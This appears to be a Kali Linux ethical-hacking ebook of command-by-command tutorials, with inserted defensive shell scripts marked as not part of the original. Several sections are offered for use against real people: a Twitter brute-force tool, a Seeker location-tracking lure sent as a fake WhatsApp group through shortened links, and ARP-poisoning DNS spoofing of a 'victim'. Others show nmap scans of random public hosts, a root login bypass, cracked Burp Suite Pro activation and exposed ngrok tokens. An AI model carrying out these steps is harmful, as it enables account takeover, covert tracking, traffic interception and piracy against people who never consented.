https://www.kakarstore.com/
https://twitter.com/wali_khan_kakar
https://www.instagram.com/walikhankakaro/
Kakar Ethical Hacking eBook
Buy on Amazon and Daraz:
Link: https://www.kakarstore.com/kakartech-ethical-hacking-ebook/
Kakar Termux Ethical Hacking eBook
Buy on Amazon and Daraz:
Link: https://www.daraz.pk/products/i392485427.html?spm=a1zawk.23436738.content_wrap.6.63f04edfAdk3jP
Contents
Kakar Ethical Hacking eBook
Kakar Termux Ethical Hacking eBook
Disclaimer!
Warning!
How to install Oracle VM VirtualBox
How to install Kali Linux
Kali Linux Update and Upgrade
Kali Linux commands
What are Daemons in Linux? & How to Run Daemon Process
How to Install Tor Browser in Kali Linux
Twitter Brute force (tweetshell)
Find All Social Media Accounts Using a Single Username
How to find website vulnerabilities in Kali Linux
session is not supported. ($XAUTHORITY is /home/kali/.Xauthority which is owned by kali.)
How to secure Web server from hackers.
Dark Web Installation
How to Create Dark Web Website
Linux Security: Securing Linux using UFW (Uncomplicated Firewall)
Nmap
Firewall Bypass How to Do No-Ping Scan with NMAP
Network Hacking using NMAP Scanning
Kali Linux login bypass
DNS Spoofing
Apache2 Server
If not work try this code
HoneyPot
Track Location (Seeker)
Ngrok Installation
Browser Hacking using BeEF (Browser Exploitation Framework)
Exif Tool (Information Gathering Tool)
How to Secure Your Systems and Servers | WAF and OWASP
Capturing and Analyzing Network Packets with Wireshark
Install Hacking Scripts, Tools, and Wordlists
Initramfs Problem
Increase Internet Speed in Kali Linux
NetBIOS Enumeration | How to Perform Enumeration of NetBIOS
Install Metasploitable 2 on Virtual Machine
Bash Shell Scripting: Intro to File and permissions
Email Footprinting
Bug Bounty
Website Footprinting
Subdomains Enumeration
Footprinting Techniques (DNS, WHOIS)
Facebook Information Gathering
Scan WordPress Vulnerabilities
Fraud Exposed | How to Expose a Scammer
How to Hack WhatsApp QRL Jacking Exploitation Framework in Kali Linux
How to Hack Webcam, Microphone and get Mobile Location using a Link
DNS Enumerate
How to Enumerate SNMP
Web Cam Hacking using CamPhish
NIKTO Web vulnerability scanner tool for Kali Linux
Practically Perform Vulnerability Assessment
MAC Changer in Shell Scripting
How to Enumerate NetBIOS
How to Enumerate NFS (Network File System)
E: dpkg was interrupted, you must manually run 'sudo dpkg --configure -a' to correct the problem.
Shared Clipboard Text Windows to kali Linux host in Virtual Box | Copy, and Paste Windows to Kali Linux
How to avoid anonymity leaks? Stay anonymous
Remotely Control an Android Device
domain using OSiNT Tool
How to Create a Remote Access Trojan (RAT)
Enumeration - How to Enumerate SMTP
How to Change Private IP using shell Program
Clear All Logs from Windows and Linux
Monitor Mode Switcher Using Shell Scripting
How to Remove Rootkits from Our Devices
Advanced Hacking with Nmap
How to Remove Cache Files
How to Create Payload
How Hackers Hack Your Phone Remotely
How to Perform DoS Attack
Install and use GR-GSM
Password Protect GRUB Boot Loader
What is Podman? Use Kali Linux on Windows 11
How Hackers can own your system
CSI Installation | A Perfect OS for Cyber Security and Cyber Crime Investigation
Setup Web Pentesting Lab for Bug Hunting
How to Perform DDoS Attacks
Sock Puppet hackers technique for OSINT
How to install Spiderfoot
How to find social media accounts by username
Mapping Social Media Profiles with Facial Recognition using Social Mapper
Trape: easily track location, IP, OS, Browser of people, and browser hooking
Recon-ng Web Reconnaissance Framework | Trace location, Pushpin, Images
HTTrack website copier: How to clone any website | extract website data
How to easily setup web Pentesting lab on localhost for bug bounty
Hollywood-style terminal emulator
Fully Anonymize Your System with Tor Network Gateway using Nipe
METADATA (Hidden information of website download public documents)
Create a static name for the dynamic IP address for access localhost from anywhere
Host your own fast OSiNT username search web-server
Social Engineering Toolkit (SET)
Discover and extract hostnames of target IP addresses
Information Gathering | DNS-ENUM
Information gathering | DNS-RECON
Information Gathering | IDS and IPS Identification lbd
Information Gathering | IDS and IPS Identification - wafw00f
dmitry
Website nameserver information nslookup
whois lookup
Metasploit
Hydra
What is the Payload
Bettercap Framework
How to investigate an Email ID
Netcat | Swiss army knife of hacking tools
Master of hacker tool to perfect scan any website | Masscan
Mobile Security Framework
Easily expose your localhost services to the internet
Stay Anonymous online like a pro
Twitter OSINT (Open Source Investigation)
Breaking SERVER Systems using MySQL
Cmatrix
Show Neofetch on Kali Linux Terminal
How Hackers Exploit SSH to Hack Your System? | System Hacking using SSH
How Hackers Remotely Hack Any Device using FTP
Hack Systems: How to use Netcat Commands with Examples?
Disclaimer!
This book is only for educational purposes.
This book promotes only cybersecurity
knowledge.
We are not responsible for any legal activities so
Kali Linux for illegal or Black
Hat Hacking activities.
Warning!
This publication is in copyright. Subject to
statutory exception and the provisions of
relevant collective licensing agreements, no
reproduction of any part may take place without
the written permission of book author Wali
Khan Kakar
Published: 2022
Book Author: Wali Khan Kakar
Gmail: walikhankakar313@gmail.com
How to install Oracle VM VirtualBox
1: Visit the official Oracle website.
2: Then click Download.
3: Now download Windows hosts.
4: Install Microsoft Visual C++.
Website: https://learn.microsoft.com/en-US/cpp/windows/latest-supported-vc-redist?view=msvc-170
How to install Kali Linux
1: Visit the official Kali Linux website.
2: Click on Download.
3: Install the Kali Linux Installer file.
4: Download Installer
5: Or download VirtualBox.
6: Open Oracle VM VirtualBox Manager.
7: Create a new machine.
8: Use the same settings as in the picture below.
9: Select the Kali Linux ISO image file.
10: Next, Next, Next.
11: Start Kali Linux.
12: Wi-Fi USB settings are as in the picture below.
13: Go to Graphical Install.
14: Follow the same settings as shown.
15: Click on Yes.
16: Follow the same settings.
Kali Linux Update and Upgrade
1: Open the Kali Linux machine.
2: Open the Terminal and type.
Command: apt-get update
3: Now upgrade Kali Linux.
Command: apt-get upgrade
Kali Linux commands
1: How to check the IP address in Kali Linux.
Command: ifconfig
2: Know your Kali Linux name.
Command: uname
3: How to check the commands you have entered in Kali Linux?
Command: history
4: How to list files in Kali Linux?
Command: ls
Command: ls -la
Command: ls -l
5: How to go back one directory in Kali Linux?
Command: cd ..
6: How to create a file in Kali Linux?
Command: touch (File name)
Example: touch kakarstore.txt
7: How to remove files from Kali Linux?
Command: rm kakarstore.txt
8: How to create a folder in Kali Linux?
Command: mkdir (Folder name)
Example: mkdir kakarstore
9: How to remove a folder in Kali Linux?
Command: rmdir (Folder name)
10: How to copy files in Kali Linux?
Command: cp (File name) /home/
11: How to check file and folder permissions in Kali Linux?
Command: ls -l (File or folder name)
12: Change Directory.
Command: cd Desktop
13: Check Kali Linux information.
Install: neofetch
Command: cat /etc/os-release
14: Kali Linux text editor.
Install: gedit
15: Kali Linux copy command.
Command: cp (File name) (Destination)
Example: cp kakarstore.txt /home/
16: Clear the Kali Linux terminal.
Command: clear
17: Move Kali Linux files.
Command: mv (File name) (Destination)
Example: mv kakarstore.txt /home/
18: Open a file in the Kali Linux text editor.
Command: gedit (File Name)
Example: gedit kakarstore.txt
19: How to show file content in Kali Linux.
Command: cat (File Name)
Example: cat kakarstore.txt
20: How to remove directories from Kali Linux.
Command: rm -rf (Directory Name)
Example: rm -rf kakarstore
What are Daemons in Linux? & How to Run Daemon Process
What is Daemon?
1. Program with a unique purpose
2. Utility Programs
3. Run silently in the background
4. Monitor and take care
5. Subsystems of Systemd with ending d (smtpd)
1: Check Daemon.
Code: ps -aux
How to Install Tor Browser in Kali Linux
1: Install the Tor browser.
Command: sudo apt install torbrowser-launcher -y
Command: sudo apt install -y tor torbrowser-launcher
2: Launch the Tor browser.
Code: torbrowser-launcher
3: Connect.
4: Start tor service.
Code: sudo service tor start
Twitter Brute force (tweetshell)
1: Clone tweetshell.
Code: git clone https://github.com/Mehran/tweetshell.git
2: cd tweetshell/
3: chmod +x tweetshell.sh
4: Run tweetshell.
Code: ./tweetshell.sh
5: Start service Tor.
Code: service tor start
Find All Social Media Accounts Using a Single Username
1: Install Userrecon.
Code: git clone https://github.com/issamelferkh/userrecon.git
2: Go to the userrecon directory.
Code: cd userrecon
3: First check the userrecon list.
Command: ls
4: Give permissions to userrecon.
Code: chmod +x userrecon.sh
5: Start the userrecon.
Command: ./userrecon.sh
6: Put username.
Code: kakarstore
7: Userrecon searching elonmusk social media information.
8: Open the userrecon scan file.
Code: nano kakarstore.txt
How to find website vulnerabilities in Kali Linux
1: Install Uniscan.
Code: uniscan
2: Take website details.
Code: uniscan -u https://www.kakarstore.com
3: Go to the report folder.
Code: cd /usr/share/uniscan/report/
4: For more details.
Code: uniscan -u https://www.website.com -hufbqwedsriogj
5: Check the report folder.
Code: ls
6: Open the website data file.
Code: firefox www.websitename.com
7: Remove Files.
Code: rm ../sites.txt
8: For Bing search.
Code: uniscan -i
9: Bing scans files.
Code: cat ../sites.txt
10: Open files.
Code: leafpad ../sites.txt
11: For UI.
Code: uniscan-gui
Running firefox as root
session is not supported.
($XAUTHORITY is /home/kali/.Xauthority which is owned by kali.)
1: Check tor status.
Code: service tor status
2: Start tor service.
Code: service tor start
3: Change ownership.
Code: chown root:root /home/kali/.Xauthority
4: Open files in firefox.
Code: firefox www.website.com.html
How to secure Web server from hackers.
1: Install Libapache2.
Command: apt install libapache2-mod-security2
2: cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
3: cd /etc/modsecurity
4: ls
5: nano modsecurity.conf
6: service apache2 restart
Dark Web Installation
1: pip3 install onionsearch
2: sudo apt install tor
3: sudo service tor start
4: onion search output
filename.txt
OR---
1: Install Tor Browser for Linux.
Website: https://www.torproject.org/download/
2: Go to the Downloads directory where Tor Browser is downloaded.
Code: cd Downloads
3: Go to the Download directory and extract the tor browser file manually.
4: Go to tor-browser_en-US
Code: cd tor-browser_en-US
5: Go to the Tor Browser directory tor-browser_en-US and install all tor browsers directly.
6: Start tor browser.
7: You can find Dark Web websites on the Hidden Wiki website.
Website: https://thehiddenwiki.org/
How to Create Dark Web Website
1: Install tor.
Code: apt install tor
2: Start the apache2 server.
Code: service apache2 start
3: Open localhost in the browser.
Code: localhost
4: Go to the tor configuration file.
Code: cd /etc/tor
5: Check tor lists.
Code: ls
6: Open the torrc file.
Code: nano torrc
7: Find the hidden service directory and port lines.
8: Remove the hash (#) from those lines.
9: Save the file.
Code: Ctrl + s
10: Exit the file.
Code: Ctrl + x
11: Start tor.
Code: tor
12: Go to the tor file directory.
Code: cd /var/lib/tor/hidden_service
13: Check the hostname file.
Code: ls
14: Open hostname.
Code: cat hostname
15: Copy the onion link and paste it into the tor browser to check how it works.
Code: 7hel77fqrg53wbl3bmzwrhffomuh5xwbujlrwfe7o62zbuu5tprghhyd.onion
16: If tor does not start, paste this code in the terminal.
Code: service tor start
Linux Security: Securing Linux using UFW (Uncomplicated Firewall)
1: apt install ufw
2: ufw default deny incoming
3: ufw enable
4: ufw status verbose
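Added example, not part of the original book: a shell function that reads the text printed by step 4 (ufw status verbose) and reports whether the firewall is active, whether the incoming default is deny, and which ports accept traffic from any source. The function name ufw_audit and the sample output are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit the text produced by `ufw status verbose`.
# Live use: ufw status verbose | ufw_audit

# Constructed sample of `ufw status verbose` output (not captured from a real host).
SAMPLE_STATUS='Status: active
Logging: on (low)
Default: deny (incoming), allow (outgoing), disabled (routed)
New profiles: skip

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW IN    Anywhere
80/tcp                     ALLOW IN    Anywhere
5432/tcp                   ALLOW IN    192.168.1.0/24
22/tcp (v6)                ALLOW IN    Anywhere (v6)'

# ufw_audit: read status text on stdin, print findings,
# return 0 when nothing failed and 1 otherwise.
ufw_audit() {
    awk '
        /^Status:/  { active = ($2 == "active") }
        /^Default:/ { deny_in = ($0 ~ /(deny|reject) \(incoming\)/) }
        # Rule rows look like "<to>  ALLOW IN  <from>"; collect the ones
        # whose source is Anywhere, listing each port once (v4 and v6 rows
        # share the same first column).
        $0 ~ /ALLOW( IN)?[ \t]+Anywhere/ && !($1 in seen) {
            seen[$1] = 1
            list = (list == "" ? $1 : list "," $1)
        }
        END {
            fail = 0
            if (active) { print "OK   firewall is active" }
            else        { print "FAIL firewall is not active"; fail = 1 }
            if (deny_in) { print "OK   default incoming policy is deny or reject" }
            else         { print "FAIL default incoming policy is not deny"; fail = 1 }
            print "INFO open to any source: " (list == "" ? "none" : list)
            exit fail
        }
    '
}
```

On a host that is administered over SSH, an allow rule for SSH (for example ufw allow ssh) has to exist before step 3, because the deny default from step 2 otherwise blocks new SSH sessions once the firewall is enabled.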
Nmap
1: Install Nmap.
Command: sudo apt-get install nmap
2: Website details.
Command: nmap google.com
3: Scan random targets.
Command: nmap -iR 4
4: Random targets IP.
IP: 200.8.223.39
5: Port scanning random targets IP.
Command: nmap -sS 200.8.223.39
6: How to connect to a port.
Command: nc 200.8.223.39 135
7: Check Version.
Command: nmap -sV 185.151.30.175
8: Website information gathering.
Command: ipcalc 185.151.30.175
9: Scan Network IP.
Command: nmap 185.151.30.0/24
10: Fast scanning.
Command: nmap -F 185.151.30.0/24
11: UDP Scanning.
Command: nmap -sU 185.151.30.175
Firewall Bypass How to Do No-Ping Scan with NMAP
1: Scan system IP.
Code: nmap -Pn 192.168.50.8-255 -p 1-65535 -v
Network Hacking using NMAP Scanning
1: Scan IP Address.
Code: nmap -sT -T4 -sV -v -O -p 1-65535 192.168.84.129 -oX hackers.xml
2: Check the hackers.xml file.
Code: ls
3: Convert XML file into HTML.
Code: xsltproc hackers.xml -o hackers.html
4: Check the HTML file.
Code: ls
5: Run the hackers.html file; Firefox does not run as the root user.
6: Exit from the root shell.
Code: exit
7: Open the hackers.html file.
Code: firefox hackers.html
8: Nmap scan report.
9: Scan script.
Code: nmap -sT -T4 -sV -p 1-65535 -O -v -sC 192.168.43.235 -oX scripttech.xml
10: Check the scripttech.xml file.
Code: ls
11: Convert scripttech.xml file into HTML.
Code: xsltproc scripttech.xml -o scripttech.html
12: Check scripttech.html file.
Code: ls
13: Exit the root shell.
Code: exit
14: Open scripttech.html file.
Code: firefox scripttech.html
Kali Linux login bypass
1: Open Kali then enter E.
2: Find Linux and delete ro quiet splash or rw quiet splash init=/bin/bash
3: Write rw init=/bin/bash
4: Run.
Code: ctrl + x
5: Screen look like?
6: You can change Kali old password.
Code: passwd root
7: Check passwords.
Code: cat /etc/shadow
DNS Spoofing
1: Open the Ettercap configuration file.
Code: leafpad /etc/ettercap/etter.conf
2: Remove hash from redir and save (iptables).
3: Start apache2 service.
Code: service apache2 start
4: Check your Kali Linux IP.
Code: ifconfig
5: Create configuration.
Code: leafpad /etc/ettercap/etter.dns
6: Save the file.
7: Open ettercap.
Code: ettercap -G
8: Select eth0.
9: Stop the sniffing.
10: Set target (Current target)
11: Scan host (Scan for hosts)
12: Check the Hosts list.
13: Add 192.168.43.1 (Add to Target 2)
14: Add victim ip in Target 1 (192.168.49.234)
15: Go to the Man in the Middle (MITM) and select ARP Poisoning.
16: Select sniff remote connections.
17: Go to Plugins and select Manage plugins.
18: Activate dns spoof.
19: Start sniffing.
Apache2 Server
1: Install apache2.
Code: sudo apt-get install apache2
2: Check whether apache2 is installed or not.
Code: apt list --installed apache2
3: Start the apache2 server.
Code: sudo service apache2 start
4: Check apache2 status.
Code: service apache2 status
Apache2 starting problem
1: Run these commands.
Command: sudo apt-get purge apache2
Command: sudo apt-get install apache2
If not work try this code
1: sudo apt-get -o DPkg::Options::="--force-confmiss" --reinstall install apache2
2: apt-get purge libapache2-mod-php5 php5
3: apt-get install libapache2-mod-php5 php5
HoneyPot
1: Install White Hat Panda.
Code: git clone https://github.com/H4CK3RT3CH/pentbox-1.8.git
2: Go to the Pentbox directory.
Code: cd pentbox-1.8/
3: Run Pentbox.
Code: ./pentbox.rb
4: Network tools Honeypot.
5: Use Kali Linux IP (ifconfig)
6: Ctrl + c (For exit)
Track Location (Seeker)
1: Install Seeker.
Code: git clone https://github.com/thewhiteh4t/seeker.git
2: Download Ngrok for Kali Linux.
3: Extract the Ngrok-v3-stable file.
4: Give permissions to Ngrok.
Code: chmod +x Ngrok
5: Copy the Ngrok token and paste it in Kali Linux.
Code: ./ngrok config add-authtoken 1vnrtKhM3aDeq3Lx0gp3aX0APeJ_aXJrynxnhdNmQerBn800
6: Go to the seeker directory.
Code: cd seeker
7: Update and Upgrade Kali Linux.
Code: apt update && apt upgrade
8: Install Python3.
Code: apt install python3 python-pip php
9: Install requirements.
Code: pip3 install requests
10: Run Seeker.
Code: python3 seeker.py
11: Select 0.
12: Run Ngrok.
Code: ./ngrok http 8080
1: Go to the seeker directory.
Code: cd seeker
2: Permit to install.sh.
Code: chmod +x install.sh
3: Run the install.sh.
Code: ./install.sh
4: Seeker help.
Code: ./seeker.py -h
5: Run seeker.
Code: ./seeker.py
6: Create a fake WhatsApp group.
Code: 2
7: Give a name to a fake WhatsApp group.
Code: Ethical Hacker
8: Move your logo directly into the seeker folder and use just the logo name.
Code: Ethical Hacker
9: Logo size will be 300x300.
10: If moving the logo into the seeker folder gives permission denied.
Code: chmod +777 seeker
11: If you want to use this outside of Kali Linux, use ngrok or the Cloudflare docs server.
12: Create a Cloudflare doc account.
Website: https://dash.cloudflare.com/sign-up
13: Clone cloudflare doc.
Code: git clone https://github.com/cloudflare/cloudflared.git
14: Install cloudflared-linux-amd64.
Code: wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb && dpkg -i cloudflared-linux-amd64.deb
15: Extract the cloudflared-linux-amd64.deb file.
16: Go to the cloudflared-linux-amd64 directory.
Code: cd cloudflared-linux-amd64
17: Check the usr folder.
Code: ls
18: Go to the usr directory.
Code: cd usr
19: Check the bin directory.
Code: ls
20: Go to the bin directory.
Code: cd bin
21: Run Cloudflare.
Code: ./cloudflared --url 0.0.0.0:8080
22: Here is the link to copy.
23: Create a Bitly account.
Website: https://app.bitly.com
24: Paste Cloudflare URL into Bitly.
Code: https://miles-warning-crossword-adventures.trycloudflare.com
25: The link is short now; send it to your WhatsApp and try how it works.
26: You can use Grabify IP Logger for link shortening.
Website: https://grabify.link/
27: When you open the link the interface will be like that.
28: Open Google Maps Link.
Ngrok Installation
1: Create a ngrok account.
2: Copy the link of Download for Linux.
3: Install it.
Code: wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
4: Extract the ngrok file.
Code: tar zxvf ngrok-v3-stable-linux-amd64.tgz
5: Copy Connect your account and run it.
Code: ./ngrok config add-authtoken 1vnrtKhM3aDeq3Lx0gp3aX0APeJ_aXJrynxnhdNmQerBn423
6: Connect the ngrok server.
Code: ./ngrok http 80
7: Start the Apache2 server.
Code: sudo service apache2 start
8: Check the apache2 server status.
Code: sudo service apache2 status
9: If you want to change your ngrok authtoken.
10: Change authtoken in the ngrok file.
Code: sudo nano .config/ngrok/ngrok.yml
11: Remove the old authtoken and paste the new one.
12: Save the file.
Code: ctrl + o or ctrl + x
Browser Hacking using BeEF (Browser Exploitation Framework)
1: Go to BeEF website https://beefproject.com
Code: git clone https://github.com/beefproject/beef.git
2: Go to the beef directory.
Code: cd beef
3: Install script.
Code: ./install
4: Install Bundle.
Code: sudo bundle install
5: Run beef-xss.
Code: beef-xss -h
6: Run beef.
Code: beef
7: Run beef-xss.
Code: beef-xss
8: Run beef.
Code: sudo beef-xss
9: Set a new password for beef.
10: Activate ngrok.
Code: ./ngrok http 3000
11: Copy Public IP in ngrok.
Code: 566b-203-81-241------ngrok.io
12: Create Password in config.yaml file.
Code: gedit config.yaml
13: Remove Hash# from public, host, https.
14: Add ngrok forwarding (Public IP) into host ex 566b-203-81-241------ngrok.io
15: Port 443.
16: https true.
17: Save it.
18: Go to the demo page here.
19: Go to the advanced demo page.
20: Go to ngrok http 3000 and copy Public IP Address.
21: Paste the Public IP Address on the advanced demo page.
1: Install BeEF.
Code: sudo apt-get install beef-xss
2: Start apache2 service.
Code: service apache2 start
3: Go to File System var www html Open index.html file
Or
Code: /var/www/html
Exif Tool (Information Gathering Tool)
1: Install Exif Tool.
Code: exiftool
2: Exif Tool help.
Code: man exiftool
3: For Information gathering.
Code: exiftool -a -r (File or image name)
How to Secure Your Systems and Servers | WAF and OWASP
1: Go to OWASP GitHub.
Code: git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.git
2: Go to the owasp-modsecurity-crs directory.
Code: cd owasp-modsecurity-crs
3: Move rules.
Code: mv rules /etc/modsecurity/
4: Move the crs-setup.conf.example file.
Code: mv crs-setup.conf.example /etc/modsecurity/crs-setup.conf
5: Change in apache server.
Code: nano /etc/apache2/mods-enabled/security2.conf
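Added example, not part of the original book: a shell check for the two files edited in the ModSecurity steps (modsecurity.conf in "How to secure Web server from hackers" and security2.conf in this section). It reports whether the rule engine actually blocks and whether the moved CRS rules are loaded. The function names, the sample file contents and the Include line for /etc/modsecurity/rules are assumptions; the book does not show what to change in either file.

```shell
#!/bin/sh
# Added example: verify the files edited in the ModSecurity steps.
# Usage: modsec_check /etc/modsecurity/modsecurity.conf \
#                     /etc/apache2/mods-enabled/security2.conf

# Print the value of the last uncommented SecRuleEngine line, or "unset".
modsec_engine_mode() {
    awk '/^[ \t]*SecRuleEngine[ \t]+/ { mode = $2 }
         END { print (mode == "" ? "unset" : mode) }' "$1"
}

# Succeed if an Include/IncludeOptional line loads the moved CRS rules.
# The directory comes from the "mv rules /etc/modsecurity/" step; the
# Include line itself is an assumption about the edit in step 5.
crs_rules_included() {
    grep -Eq '^[[:space:]]*Include(Optional)?[[:space:]]+/etc/modsecurity/rules/\*\.conf' "$1"
}

# modsec_check MODSECURITY_CONF SECURITY2_CONF
# Prints one line per finding; returns 0 only if both checks pass.
modsec_check() {
    rc=0
    mode=$(modsec_engine_mode "$1")
    case "$mode" in
        On) echo "OK   SecRuleEngine On: matching requests are blocked" ;;
        DetectionOnly)
            echo "FAIL SecRuleEngine DetectionOnly: rules only log, nothing is blocked"
            rc=1 ;;
        *)  echo "FAIL SecRuleEngine is $mode"; rc=1 ;;
    esac
    if crs_rules_included "$2"; then
        echo "OK   CRS rules directory is included"
    else
        echo "FAIL no Include line for /etc/modsecurity/rules/*.conf"
        rc=1
    fi
    return "$rc"
}

# Write constructed sample files into directory $1: the state right after
# copying modsecurity.conf-recommended ("before") and after editing ("after").
write_samples() {
    cat > "$1/modsecurity.before.conf" <<'EOF'
# -- Rule engine initialization --
SecRuleEngine DetectionOnly
SecRequestBodyAccess On
EOF
    cat > "$1/modsecurity.after.conf" <<'EOF'
# SecRuleEngine DetectionOnly
SecRuleEngine On
SecRequestBodyAccess On
EOF
    cat > "$1/security2.before.conf" <<'EOF'
SecDataDir /var/cache/modsecurity
IncludeOptional /etc/modsecurity/*.conf
EOF
    cat > "$1/security2.after.conf" <<'EOF'
SecDataDir /var/cache/modsecurity
IncludeOptional /etc/modsecurity/*.conf
Include /etc/modsecurity/rules/*.conf
EOF
}
```

The copied modsecurity.conf-recommended ships with SecRuleEngine DetectionOnly, so the "before" state logs matches without blocking them. Running apache2ctl configtest before restarting Apache catches syntax errors in the edited files.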
Capturing and Analyzing Network Packets with Wireshark
1: Install Wireshark.
Code: wireshark
2: Wireshark is already present in Kali Linux by default.
Install Hacking Scripts, Tools, and Wordlists
1: First update and upgrade Kali.
Command: apt-get update
Command: apt-get upgrade
2: Clone discover GitHub.
Code: git clone https://github.com/leebaird/discover
3: Go to the discover directory.
Code: cd discover/
4: Run update.sh.
Code: ./update.sh
5: Run discover.
Code: ./discover
6: Go to opt directory.
Code: cd /opt
7: Go to the SecLists directory.
Code: cd SecLists/
8: Go to the passwords directory.
Code: cd passwords/
9: Install SecLists.
Code: git clone https://github.com/danielmiessler/SecLists.git
OR---
1: Download Burpsuite.
2: Unzip Burpsuite.
Code: unzip Burpsuite.zip
3: Go to the Burpsuite directory.
Code: cd Burpsuite/
4: Run the ESEdition.jar file.
Code: java -noverify -jar ESEdition.jar
5: Write your name in licensed to ---.
Code: Kakar
6: Run it.
7: If it does not run directly then open a new tab.
8: Open the burpsuite_pro_v1.7.34.jar file.
Code: java -jar burpsuite_pro_v1.7.34.jar
9: Download Java JDK 8 version .deb.
10: Save the file.
11: Open Package.
Code: dpkg -I openlogic-openjdk-jre-8u262-b10-linux-x64-deb.deb
12: Update alternatives.
Code: update-alternatives --config java
13: Select 2.
14: Start Burpsuite.
Code: java -noverify -jar ESEdition.jar
15: Copy the License then paste it into Enter license key.
16: Next and go to Manual activation.
17: Copy request and paste into Request then select Response and paste into Paste response.
18: Next and Finish.
19: Open the same tab.
Code: ctrl + shift + n
20: Run Burpsuite.
Code: ./burp.sh
21: Add Burpsuite in firefox.
OR---
1: Go to the source list directory.
Code: cd /etc/apt
2: Open sources list file.
Code: gedit sources.list
3: Remove Hash # from Number 5.
4: Save it.
5: Update and Upgrade Kali Linux.
Command: apt-get update
Command: apt-get upgrade
Initramfs Problem
1: Check the Problem directory.
Code: blkid
2: Check swap sda5.
Code: fsck /dev/sda5 -y
3: It means swap sda5 is ok.
4: Check sda1.
Code: fsck /dev/sda1 -y
5: sda1 has errors.
6: Restart.
Increase Internet Speed in Kali Linux
1: Choose DNS Server.
Code: sudo mousepad /etc/resolv.conf
2: Change nameservers and add the Google Domain Name Servers.
nameserver 8.8.8.8
nameserver 8.8.4.4
3: Save the file.
4: Follow this command.
Code: sudo apt-get clean
5: Then do this.
Code: sudo apt-get install apt-transport-https -y
6: Follow this command.
Code: sudo mousepad /etc/apt/sources.list
7: Change HTTP to HTTPS.
8: Save the file.
9: Update Kali Linux.
Code: sudo apt-get update
10: Install any software to check the internet speed.
NetBIOS Enumeration | How to Perform Enumeration of NetBIOS
1: Open Metasploitable Machine and check IP Address.
Code: ifconfig
2: Check IP Address.
Code: ping 192.168.1.1
3: Check open Ports.
Code: nmap -sT -T4 -sV -O -p 1-65535 -v 192.185.141.193
4: Check NetBIOS IP.
Code: nbtscan 192.168.92.134 -v
Install Metasploitable 2 on Virtual Machine
1: First go to the Metasploitable 2 website.
Website: https://sourceforge.net/projects/metasploitable/
2: Download it.
3: Extract the Metasploitable 2 folder.
4: Open VirtualBox and select New.
5: VirtualBox settings.
6: 1 GB RAM is enough.
7: Use an existing virtual hard disk file.
8: Select the Metasploitable2 file.
9: Go to Settings and select Bridged Adapter.
10: Start it.
11: Metasploitable 2 password is the default.
Command: msfadmin (Login)
Command: msfadmin (Password)
Bash Shell Scripting: Intro to File and permissions
1: Create a file.
Code: gedit shtest.sh
2: Write something in the file.
3: Save the file.
4: Check the shtest file in the list.
Code: ls
5: Check shtest file permissions.
Code: ls -l
6: Give permission to shtest.sh file.
Code: chmod +x shtest.sh
7: Run shtest.sh file.
Code: ./shtest.sh
8: Check file content.
Code: cat shtest.sh
9: Give permissions as you wish to the file.
Code: chmod -rwx shtest.sh
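Added example, not part of the original book: the chmod steps above replayed on a scratch copy of shtest.sh, printing the octal mode after each step, plus a check that lists files any user on the system can modify. The function names mode_of, chmod_walkthrough and world_writable are hypothetical, and the files are constructed in a temporary directory.

```shell
#!/bin/sh
# Added example: what the chmod steps do to the mode bits, and how to spot
# files that are writable by everyone.

# Print the octal mode of a file, e.g. 644 (stat -c as on GNU/Linux).
mode_of() { stat -c '%a' "$1"; }

# Replay steps 1, 6 and 9 on a scratch file and print the mode after each.
# umask 022 is set explicitly so the result does not depend on the caller;
# the function body runs in a subshell, so the caller's umask is untouched.
chmod_walkthrough() (
    umask 022
    dir=$(mktemp -d) || exit 1
    f="$dir/shtest.sh"
    printf '#!/bin/sh\necho hello\n' > "$f"
    printf 'created=%s ' "$(mode_of "$f")"      # rw-r--r--
    chmod +x "$f"                               # step 6: add execute for all
    printf 'plus_x=%s ' "$(mode_of "$f")"       # rwxr-xr-x
    chmod -rwx "$f"                             # step 9: remove every permission
    printf 'minus_rwx=%s\n' "$(mode_of "$f")"   # ---------
    rm -rf "$dir"
)

# List regular files under directory $1 that are writable by "other"
# (octal bit 0002), one path per line, sorted.
world_writable() {
    find "$1" -type f -perm -0002 | sort
}
```

After step 9 the mode is 0, so ./shtest.sh no longer runs for an ordinary user until chmod +x (and read permission) is given back.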
Email Footprinting
1: Open email, Gmail.
2: Go to Show original.
3: Copy to clipboard.
4: Go to the IP2location website.
5: Paste the copied text into LOOKUP and check the result below.
Bug Bounty
1: Bug Bounty Jobs website.
Website: https://hackerone.com/
2: Go to Hackers then open Directory.
3: Check Domain tools website.
Website: https://research.domaintools.com/
4: Netcraft.
Website: https://www.netcraft.com/
5: Robtex.
Website: https://www.robtex.com/
6: Find a subdomain for the website and install knock subdomain tool.
Code: git clone https://github.com/guelfoweb/knock.git
7: Go to the knock directory.
Code: cd knock
8: Install requirements.
Code: pip3 install -r requirements.txt
9: Find the website domain.
Code: python3 knockpy.py google.com
10: Find website hidden files.
Code: dirb https://www.pcmag.com/picks (website or website pages)
11: Go to the wordlists directory.
Code: cd /usr/share/dirb/
Website Footprinting
1: Open the firefox Extension.
Key: ctrl + shift + a
2: Open firefox and install the Netcraft extension.
3: Install the Wappalyzer extension.
4: Use the BuiltWith website.
Website: https://builtwith.com
1: Use the subdomain finder website.
Website: https://subdomainfinder.c99.nl/
2: Website Hidden Links.
Code: dirb https://www.google.com/ (or website page link)
3: Dirb GUI.
Code: dirbuster
4: Hidden links extensions in firefox.
Link Gopher
Extracts All Links.
5: Use link extractor webtool hub website.
Website: https://www.webtoolhub.com/tn561364-link-extractor.aspx
OR---
1: Check security header website.
Website: https://securityheaders.com/
2: Find out the website IP in the Command prompt.
Code: ping www.google.com
3: Copy the Website IP Address.
4: Website SSL test.
Website: https://www.ssllabs.com/ssltest/
5: Whois lookup.
Website: https://whois.domaintools.com/
6: Netcraft.
Website: https://www.netcraft.com/
7:
Subdomains Enumeration
1: Install sublist3r (Subdomains).
Code: git clone https://github.com/aboul3la/Sublist3r.git
2: Go to the sublist3r directory.
Code: cd Sublist3r
3: Install requirements.txt.
Code: pip install -r requirements.txt
4: Give permissions to sublist3r.py.
Code: chmod +x sublist3r.py
